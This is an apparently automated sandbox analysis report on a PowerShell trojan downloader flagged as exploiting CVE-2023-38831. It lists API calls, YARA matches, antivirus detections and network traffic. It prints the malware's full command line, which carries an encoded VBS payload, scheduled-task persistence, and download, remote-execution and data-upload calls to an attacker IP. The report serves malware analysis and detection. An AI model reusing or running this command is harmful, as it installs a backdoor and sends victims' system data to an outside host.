NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\Libraries\Libraries.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -w hidden -nop -noni -exec bypass -c $a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi9SY2ViS1J2YWludlFub2VTL3BhZ2UzMTEvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UzMTEnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\\Users\\Public\\Libraries\\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/office/1.pdf');set-content "$home\\appdata\local\\temp\\481-5412-09.pdf" -value $flm -Encoding byte;

cmdline

"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 14, 2023, 10:57 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

HTTP/1.1 404 Not Found Date: Thu, 14 Dec 2023 01:57:24 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 210 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /office/1.pdf was not found on this server.</p> </body></html>

Poweshell is sending data to a remote host (1 event)

Data sent

GET /office/1.pdf HTTP/1.1 Host: 147.78.46.40:37662 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 14, 2023, 10:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f

Communicates with host for which no DNS query was performed (1 event)

host

147.78.46.40

Installs itself for autorun at Windows startup (2 events)

cmdline

"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Dec. 14, 2023, 10:57 a.m.	buffer: GET /office/1.pdf HTTP/1.1 Host: 147.78.46.40:37662 Connection: Keep-Alive socket: 1412 sent: 80	1	80	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f

Creates a suspicious Powershell process (4 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\schtasks.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Trojan.Script.Boxter.a!c
FireEye	Heur.BZC.PZQ.Boxter.783.D997B1F9
Skyhigh	BehavesLike.PS.BadFile.zn
ALYac	Exploit.CVE-2023-38831
Symantec	Trojan.Gen.NPE
ESET-NOD32	PowerShell/TrojanDownloader.Agent.HOI
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	Heur.BZC.PZQ.Boxter.783.D997B1F9
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.783.D997B1F9
Emsisoft	Heur.BZC.PZQ.Boxter.783.D997B1F9 (B)
VIPRE	Heur.BZC.PZQ.Boxter.783.D997B1F9
Ikarus	Trojan-Downloader.PowerShell.Agent
Varist	ABRisk.MRVG-1
Arcabit	Heur.BZC.PZQ.Boxter.783.D997B1F9
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
GData	Heur.BZC.PZQ.Boxter.783.D997B1F9
Google	Detected
MAX	malware (ai score=84)
Tencent	Win32.Trojan-Downloader.Downloader.Ncnw
AVG	Other:Malware-gen [Trj]

481-5412-09.pdf .cmd

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All